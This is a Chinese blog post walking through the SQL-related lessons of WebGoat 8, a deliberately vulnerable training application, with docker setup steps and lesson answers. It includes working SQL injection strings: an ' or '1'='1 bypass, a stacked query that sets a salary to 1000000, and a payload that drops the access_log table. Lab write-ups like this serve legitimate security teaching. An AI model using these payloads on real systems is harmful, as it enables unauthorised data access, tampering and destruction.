Webgoat8通关笔记(1)

最新推荐文章于 2024-05-04 20:39:07 发布
最新推荐文章于 2024-05-04 20:39:07 发布
阅读量3.3k 收藏 10
点赞数 2
分类专栏: 渗透测试 文章标签: java spring boot 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44689968/article/details/106466680
版权

1.什么是Webgoat?
WebGoat 是 OWASP 组织研制出的用于进行 web 漏洞实验的应用平台,用来说明 web 应用中存在的安全漏洞。WebGoat 运行在带有 java 虚拟机的平台之上,包括:跨站点脚本攻击(XSS)、访问控制、线程安全、操作隐藏字段、 操纵参数、弱会话 cookie、SQL 盲注、数字型 SQL 注入、字符串型 SQL 注入、web 服务、Open Authentication 失效、危险的 HTML 注释等等。WebGoat 提供了一系列 web 安全学习的教程, 某些课程也给出了视频演示,指导用户利用这些漏洞进行攻击
2.Webgoat8安装(基于docker)
下载容器:docker pull webgoat/webgoat-8.0
查看镜像:docker images
运行:docker run -p 8080:8080 -t webgoat/webgoat-8.0
浏览器访问:http://localhost:8080/WebGoat/login
在这里插入图片描述点击Register new user注册一个新账户,并登录
在这里插入图片描述

2.(A1)SQL Injection(intro)
X-02
在这里插入图片描述本题:查看示例表,尝试检索员工Bob Franco所在部门。主要考察sql语句的查询
(1)select department from employees where first_name=‘Bob’;
在这里插入图片描述(2)select department from employees where last_name=‘Franco’;
在这里插入图片描述x-03
在这里插入图片描述本题:把‘Tobi Barnett’的部门改成销售部。
update employees set department=‘Sales’ where first_name=‘Tobi’;
在这里插入图片描述x-04
在这里插入图片描述本题:给“employees”表中添加“phone”列,长度20
在这里插入图片描述x-05
在这里插入图片描述本题:尝试授予用户组“UnauthorizedUser”更改表的权限
在这里插入图片描述x-09
在这里插入图片描述本题考察字符串sql注入:
SELECT * FROM user_data WHERE first_name = ‘John’ and last_name = ‘’ or ‘1’ = ‘1’
在这里插入图片描述x-10
在这里插入图片描述本题考察数值型sql注入:
SELECT * FROM user_data WHERE first_name = ‘John’ and last_name = ‘’ or ‘1’ = ‘1’
在这里插入图片描述x-11
在这里插入图片描述本题考查字符串注入:
employee name: Smith
tan:’ or ’ 1 ’ = ’ 1
在这里插入图片描述x-12
在这里插入图片描述本题使用查询链破坏完整性:
employee name: ’ ; update employees set salary=1000000 where last_name=‘Smith’; –
tan: 随便填
在这里插入图片描述x-13
在这里插入图片描述'; drop table access_log;–
在这里插入图片描述

我不吃丶香菜
关注
  • 2
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WebGoat8 M17 XXE 全思路、题解与答案
伊维泽诺流浪记
02-27 1974
目录 01 什么是XML语言 02 实体、外部实体 03 什么是XXE 04 XXE问题3 ★ 05 XXE问题4 ★ 06 参数实体 07 XXE问题7 ★ 01 什么是XML语言 XML(EXtensible Markup Language),可扩展标记语言,是一种用于标记电子文件,使其具有结构性的标记语言,可以用来标记数据,定义数据类型。与HTML不同:HTML被设计...
WebGoat通关详解
chengede98的博客
03-22 1003
通过完成WebGoat通关过程,用户可以全面提升自己在Web安全领域的知识和技能水平。因此,我们鼓励更多的用户参与到WebGoat的学习中来,共同为构建一个更安全的Web环境贡献力量。这有助于用户了解自己的学习进度和需要改进的地方。因此,用户需要保持学习和实践的态度,不断更新自己的知识和技能。除了完成WebGoat的练习外,用户还可以关注最新的安全动态和技术趋势,参与相关的安全活动和项目实践。参考文档和社区资源:如果遇到难以解决的问题或需要进一步的帮助,用户可以参考WebGoat提供的文档和社区资源。
javaweb-webgoat8靶场+漏洞产生
xiaoheizi的博客
06-26 642
用户登录成功后,服务端通过jwt生成一个随机token给用户(服务端无需保留token),以后用户再来访问时需携带token,服务端接收到token之后,通过jwt对token进行校验是否超时、是否合法。因为网站是根据键值对在数据库对用户的输入进行验证的,所以我们可以修改一个数据库不存在的键值对编号让值为null来绕过登录。比如:网站的上传头像的目录设置了不允许执行程序文件,只允许查看头像,我们上传的脚本文件就执行不了。在爆破脚本中写入要爆破的token,运行爆破脚本,成功爆破出密匙:shipping。
如何部署webgoat-server-8.1.0项目?详细讲解
最新发布
2301_77578012的博客
05-04 591
今天搞了一天想要部署webgoat-server-8.1.0项目,结果总是报错,因为是做安全方向,所以搜了挺多的方法但是都无法解决。后面想着活人不能被liao憋死,索性不在真实机这个大熔炉执行,重新开了个win10虚拟机做了一下,结果直接成功。
Webgoat学习笔记
swordheart的博客
04-26 2729
0x00 安装 WebGoat的版本区别 WebGoat是一个渗透破解的习题教程,分为简单版和开发版,GitHub地址. 简单版安装 简单版是个JAVA的Jar包,只需要有Java环境,然后在命令行里执行 1 2 3 <code>#!bash java -jar webgoat-container-7.0.1-war-exec.jar </code> 然后就可以访问"127.0.0.1
Webgoat8(A2) Broken Authentication
weixin_44689968的博客
04-14 554
1.Authentication Bypasses 输入框随意输入:test,test 点击Submit,并使用Burpsuite抓包 Action–>Repeater 修改参数名为secQuestion3和secQuestion4 2.JWT tokens 先点击删除 使用burpsuite抓包
WebGoat教程解析
05-09
WebGoat里面关于会话劫持(Hijack a Session)这个课程的标准答案里面除了使用WebScarab以外还使用了其他的工具来找出合法的SessionID以完成这个课程,实际上这个课程完全可以只使用WebScarab来完成。
WebGoat通关详解.zip
03-22
webgoat通关
Webgoat学习笔记.zip
03-12
Webgoat学习笔记
面试必备:WebGoat实战通关指南!一(General、Injection)
03-22
webgoat通关【2024年WebGoat8.2.2通关记录一(General、Injection)简介】 内容概要: 本文为网络安全初学者提供了一个全面的学习指南,通过通俗易懂的语言,介绍了WebGoat8.2.2版本的General和Injection两个关卡的...
java csl_Java代码审计入门:WebGoat8(再会)
weixin_30538955的博客
02-23 849
WebGoat8系列文章:前情回顾数字观星 Jack Chan(Saturn),再会篇为Java代码审计入门:WebGoat8系列的第二篇,意为与WebGoat8再次相会。本篇我们将一起看看WebGoat8中的Authentication Bypasses和JWT相关安全问题。Authentication Bypasses 认证绕过这节课程首先给了我们一个2016年的PayPal双因子密码重置的漏...
WebGoat笔记
10-14
webgoat7.0的部署及题目解题教程,WebGoat里面关于会话劫持(Hijack a Session)这个课程的标准答案里面除了使用WebScarab以外还使用了其他的工具来找出合法的SessionID以完成这个课程
WebGoat最新版,直接使用
02-20
webgoat网络攻防,刷题,对信息安全技术的提升非常有帮助
webgoat-server-8.2.1
09-02
webgoat-server-8.2.1
OWASP WebGoat---安全测试学习笔记(十四)---不安全存储
光明矢的专栏
10-24 1001
主题:bu 注:
WebGoat——SQL injection
OOM
08-09 4348
1、Stage 1 Stage 1: Use String SQL Injection to bypass authentication. Use SQL injection to log in as the boss ('Neville') without using the correct password. Verify that Neville's profile can be view
WebGoat 2023靶场搭建Broken Access Control通关
apple_51763401的博客
10-14 630
WEBGOAT2023靶场第一关
WebGoat通关教程
热门推荐
锋刃科技的博客
05-05 1万+
这里我们用docker镜像一键搭建即可 用docker命令开启webgoat docker run -d -p 8081:8080 -p 9090:9090 -e TZ=Europe/Amsterdam webgoat/goatandwolf 打开192.168.109.131:8081/WebGoat和192.168.109.131:9090/WebWolf能打开即可 192.168...
WebGoatV8.1(challenges)详细过关教程
weixin_51566481的博客
08-29 956
WebGoat
webgoat通关攻略
09-18
webgoat通关的过程中,有一个关卡是关于路径遍历的。路径遍历攻击是一种常见的Web漏洞,攻击者可以通过构造特殊的请求,绕过文件上传的限制,获取到系统中的敏感文件。在webgoat中,路径遍历关卡主要包括上传文件...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值